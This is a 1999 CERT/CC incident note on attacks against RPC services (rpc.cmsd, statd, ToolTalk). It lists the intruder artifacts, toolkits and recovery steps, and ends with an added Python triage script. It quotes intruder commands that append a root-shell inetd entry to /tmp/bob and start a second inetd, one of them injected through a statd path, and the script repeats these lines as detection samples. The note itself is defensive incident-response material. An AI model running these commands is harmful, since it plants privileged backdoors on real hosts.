The CERT Coordination Center publishes incident notes to provide
information about incidents to the Internet community.

<h2>Similar Attacks Using Various RPC Services</h2>

Updated: December 9, 1999 (added information about IN-99-07)<br/>
Updated: October 15, 1999 (added information about statd exploit)<br/>
Thursday, July 22, 1999

<h3>Overview</h3>

We have received reports that intruders are using similar methods to
compromise systems. Although we have seen intruders exploit three
different RPC service vulnerabilities, the artifacts found on the
compromised systems are much the same.

<p>
Vulnerabilities we have seen exploited as a part of these attacks
include:
</p>

<ul>
<li>CA-99-08 - Buffer Overflow Vulnerability in rpc.cmsd<p>
<a href="http://www.cert.org/advisories/CA-99-08-cmsd.html">
    http://www.cert.org/advisories/CA-99-08-cmsd.html</a></p></li>
<li>CA-99-05 - Vulnerability in statd exposes vulnerability in automountd<p>
<a href="http://www.cert.org/advisories/CA-99-05-statd-automountd.html">
    http://www.cert.org/advisories/CA-99-05-statd-automountd.html</a></p></li>
<li>CA-98.11 - Vulnerability in ToolTalk RPC Service<p>
<a href="http://www.cert.org/advisories/CA-98.11.tooltalk.html">
    http://www.cert.org/advisories/CA-98.11.tooltalk.html</a></p></li>
</ul>
<h3>Description</h3>

Reports involving these vulnerabilities describe very similar
intruder activity. The level of activity and the scope of the
incidents suggest that intruders are using scripts to automate the
attacks. The scripts appear to attempt several exploits in turn, but
the result on a compromised host is much the same. We have received
reports of the following types of activity associated with these
attacks:
<p>
<ul>
<li>Core files for rpc.ttdbserverd located in the root "/" directory,
    left by an exploitation attempt against rpc.ttdbserverd<p>
<li>Files named <b>callog.*</b> located in the cmsd spool directory, left
    by an exploitation attempt against rpc.cmsd<p>
<li>Exploitations that execute similar commands to create a privileged
    back door into a compromised host. Typically, a second instance of
    the inetd daemon is started using an intruder-supplied configuration
    file. The configuration file commonly contains an entry that
    provides the intruder a privileged back door into the compromised
    host. The most common example we have seen looks like this:
    <p>
<pre>
      /bin/sh -c echo 'ingreslock stream tcp wait root /bin/sh -i' &gt;&gt; 
        /tmp/bob;/usr/sbin/inetd -s /tmp/bob
    </pre>
    If successfully installed and executed, this back door may be used
    by an intruder to gain privileged (e.g., root) access to a
    compromised host by connecting to the port associated with the
    <b>ingreslock</b> service, which is typically TCP port 1524. (inetd
    resolves the service name through /etc/services, so the listener
    is on whatever port that file assigns to the name.) The file names
    and service names are arbitrary; they may be changed to create an
    inetd configuration file in a different location or a back door on
    a different port.
    <p>
    The /tmp/bob configuration file has also appeared in exploits
    against the statd vulnerability.  The most common example we have
    seen for statd looks like this:
    <p>
<pre>
    /var/statmon/sm/; echo "pcserver stream tcp nowait root /bin/sh sh -i" &gt;&gt;
      /tmp/bob ; /usr/sbin/inetd -s /tmp/bob 
    </pre>
<p>
<li>In many cases, scripts have been used to automate intruder
    exploitation of back doors installed on compromised hosts. This
    method has been used to install and execute various intruder tools
    and tool archives, initiate attacks on other hosts, and collect
    output from intruder tools such as packet sniffers.
    <p>
    One common set of intruder tools we have seen is included in an
    archive file called <b>neet.tar</b>, which includes several
    intruder tools:<p>
<ul>
<li>A packet sniffer named <b>update</b> or <b>update.hme</b> that
        produces an output file named <b>output</b> or <b>output.hme</b><p>
<li>A back door program named <b>doc</b> that is installed as a
        replacement for /usr/sbin/inetd. The back door is activated when
        a connection arrives from a particular source port and a special
        string is supplied. We have commonly seen source port 53982
        used.<p>
<li>A replacement <b>ps</b> program to hide intruder processes. We have
        seen a configuration file installed at /tmp/ps_data on compromised
        hosts.<p>
</li></ul>
<p>
    Another common set of intruder tools we have seen is included in an
archive file called <b>leaf.tar</b>, which includes several intruder
    tools:<p>
<ul>
<li>A replacement <b>in.fingerd</b> program with a back door for
        intruder access to the compromised host<p>
<li><b>eggdrop</b>, an IRC tool commonly installed on compromised
        hosts by intruders. In this activity, we've seen the binary
        installed as /usr/sbin/nfds<p>
<li>Various files and scripts associated with eggdrop, many of which
        are installed in the directory <b>/usr/lib/rel.so.1</b><p>
<li>A replacement root crontab entry used to start eggdrop
</li></ul>
<p>
    It is possible that other tools and tool archives could be
    involved in similar activity.
    <p>
<li>Installation of distributed denial of service tools. For more
    information, see
    <p>
<dl>
<dd><a href="http://www.cert.org/incident_notes/IN-99-07.html">
    IN-99-07</a>, Distributed Denial of Service Tools
    </dd></dl>
<p>
<li>In some cases, we have seen intruder scripts remove or destroy
    system binaries and configuration files.
</li></ul>
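<p>
As an added example (it is not part of the original note and not a
CERT/CC tool), the following Python script triages the artifacts
described in the list above: it flags inetd configuration entries that
hand a root shell to any client (the ingreslock and pcserver lines
quoted above), spots a second inetd started on a non-standard
configuration file such as /tmp/bob, and matches a file listing against
the paths named for the neet.tar and leaf.tar archives. The
/etc/services excerpt, the legitimate inetd configuration paths and the
cmsd spool directory (/var/spool/calendar) are assumptions, and all
sample input is constructed rather than captured from a real incident.
</p>

```python
# Artifact triage for the RPC-exploit activity described in this note.
# Added example, not CERT/CC tooling. All inputs are constructed strings that
# mimic what a responder would collect from a suspect Solaris host; nothing
# here reads the live system, so it runs offline.
import re

# Constructed excerpt of /etc/services. ingreslock's port is stated in the
# note; pcserver's (600/tcp) is the conventional assignment.
SERVICE_PORTS = {"ftp": 21, "pcserver": 600, "ingreslock": 1524}
SHELLS = {"sh", "csh", "ksh", "bash", "tcsh", "zsh"}
# Where a legitimate inetd reads its configuration (assumed for Solaris/SunOS).
LEGIT_INETD_CONF = {"/etc/inetd.conf", "/etc/inet/inetd.conf"}


def find_backdoor_services(inetd_conf):
    """Return inetd.conf entries that hand a root shell to whoever connects.

    Field order: service socket proto wait|nowait user program [args...].
    Flagged when user is root and the program is a shell or its arguments
    ask for an interactive shell (-i); this covers both lines quoted above.
    """
    findings = []
    for raw in inetd_conf.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6:
            continue                       # blank, comment or malformed
        service, _sock, proto, _wait, user, program = fields[:6]
        is_shell = program.rsplit("/", 1)[-1] in SHELLS
        if user == "root" and (is_shell or "-i" in fields[6:]):
            findings.append({"service": service, "proto": proto,
                             "port": SERVICE_PORTS.get(service),  # None if unknown
                             "line": " ".join(fields)})
    return findings


def find_rogue_inetd(ps_output):
    """Return command lines of inetd instances started on a non-standard
    configuration file, e.g. `/usr/sbin/inetd -s /tmp/bob`.  The command is
    located by basename rather than by column because `ps -ef` prints STIME
    as either `03:12:44` or `Jul 20` (two fields).
    """
    rogue = []
    for line in ps_output.splitlines():
        fields = line.split()
        start = next((i for i, f in enumerate(fields)
                      if f.rsplit("/", 1)[-1] == "inetd"), None)
        if start is None:
            continue
        cmd = fields[start:]
        # The configuration file is the first non-option argument, if any.
        conf = next((a for a in cmd[1:] if not a.startswith("-")), None)
        if conf is not None and conf not in LEGIT_INETD_CONF:
            rogue.append(" ".join(cmd))
    return rogue


# Paths the note names as left behind by the exploits and tool archives.
# The cmsd spool location (/var/spool/calendar) is assumed; adjust per host.
ARTIFACT_PATTERNS = [
    (r"^/core(\.\d+)?$", "core in / (rpc.ttdbserverd attempt)"),
    (r"^/var/spool/calendar/callog\.", "callog.* (rpc.cmsd attempt)"),
    (r"^/tmp/bob$", "intruder inetd configuration"),
    (r"^/tmp/ps_data$", "trojan ps configuration (neet.tar)"),
    (r"^/usr/sbin/nfds$", "eggdrop installed as nfds (leaf.tar)"),
    (r"^/usr/lib/rel\.so\.1(/|$)", "eggdrop support files (leaf.tar)"),
    (r"/output(\.hme)?$", "sniffer output (neet.tar)"),
]


def flag_artifact_paths(paths):
    """Match a file listing (e.g. `find / -xdev -print`) against the patterns."""
    hits = []
    for path in paths:
        for pattern, why in ARTIFACT_PATTERNS:
            if re.search(pattern, path):
                hits.append((path, why))
                break
    return hits


# Constructed sample data (not captured from a real incident).
SAMPLE_INETD_CONF = """\
ftp        stream tcp nowait root   /usr/sbin/in.ftpd    in.ftpd
# the two intruder entries quoted in the note
ingreslock stream tcp wait   root   /bin/sh -i
pcserver   stream tcp nowait root   /bin/sh sh -i
"""
SAMPLE_PS = """\
     UID   PID  PPID  C    STIME TTY      TIME CMD
    root   134     1  0   Jul 20 ?        0:01 /usr/sbin/inetd -s
    root  4821     1  0 03:12:44 ?        0:00 /usr/sbin/inetd -s /tmp/bob
"""
SAMPLE_PATHS = ["/core", "/tmp/bob", "/var/spool/calendar/callog.root",
                "/tmp/ps_data", "/usr/lib/rel.so.1/bot.conf", "/etc/passwd"]

if __name__ == "__main__":
    for f in find_backdoor_services(SAMPLE_INETD_CONF):
        print("BACKDOOR", f["service"], f["port"], "->", f["line"])
    for cmd in find_rogue_inetd(SAMPLE_PS):
        print("ROGUE INETD", cmd)
    for path, why in flag_artifact_paths(SAMPLE_PATHS):
        print("ARTIFACT", path, "-", why)
```

<p>
The ingreslock entry resolves to TCP port 1524 only because a service
name is looked up in /etc/services; a renamed service or an edited
services file moves the listener, which is why the checks key on the
root shell rather than on the port. A hit from any of the three checks
calls for treating the host as root-compromised and following the
recovery steps in the Solutions section, not for simply deleting the
files found.
</p>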
<h3>Solutions</h3>

If you believe a host has been compromised, we encourage you to
disconnect the host from the network and review our steps for
recovering from a root compromise:
<p>
<dl>
<dd><a href="http://www.cert.org/tech_tips/root_compromise.html">
http://www.cert.org/tech_tips/root_compromise.html</a>
</dd></dl>
<p>
In many cases intruders have installed packet sniffers on compromised
hosts and have used scripts to automate collection of the output
logs. Usernames and passwords used in network transactions with a
compromised host, or on the same network segment as a compromised
host, may therefore have fallen into intruder hands and should be
treated as compromised. We encourage you to address password security
after the compromised hosts at your site have been secured.
<p>
You should also review the state of security on other hosts on your
network. If usernames and passwords have been compromised, an intruder
may be able to gain unauthorized access to other hosts on your
network. Also, an intruder may be able to use trust relationships
between hosts to gain unauthorized access from a compromised host. Our
intruder detection checklist can help you to evaluate a host's state
of security:
<p>
<dl>
<dd><a href="http://www.cert.org/tech_tips/intruder_detection_checklist.html">
http://www.cert.org/tech_tips/intruder_detection_checklist.html</a>
</dd></dl>
<p>

We encourage you to ensure that your hosts are current with security
patches or work-arounds for well-known vulnerabilities. In particular,
you may wish to review the following CERT advisories for suggested
solutions:
<p>
<ul>
<li>CA-99-08 - Buffer Overflow Vulnerability in rpc.cmsd<p>
<a href="http://www.cert.org/advisories/CA-99-08-cmsd.html">
    http://www.cert.org/advisories/CA-99-08-cmsd.html</a></p></li>
<li>CA-99-05 - Vulnerability in statd exposes vulnerability in automountd<p>
<a href="http://www.cert.org/advisories/CA-99-05-statd-automountd.html">
    http://www.cert.org/advisories/CA-99-05-statd-automountd.html</a></p></li>
<li>CA-98.11 - Vulnerability in ToolTalk RPC Service<p>
<a href="http://www.cert.org/advisories/CA-98.11.tooltalk.html">
    http://www.cert.org/advisories/CA-98.11.tooltalk.html</a></p></li>
</ul>
<p>
We also encourage you to regularly review security related patches
released by your vendors.

<p>Copyright 1999 Carnegie Mellon University.</p>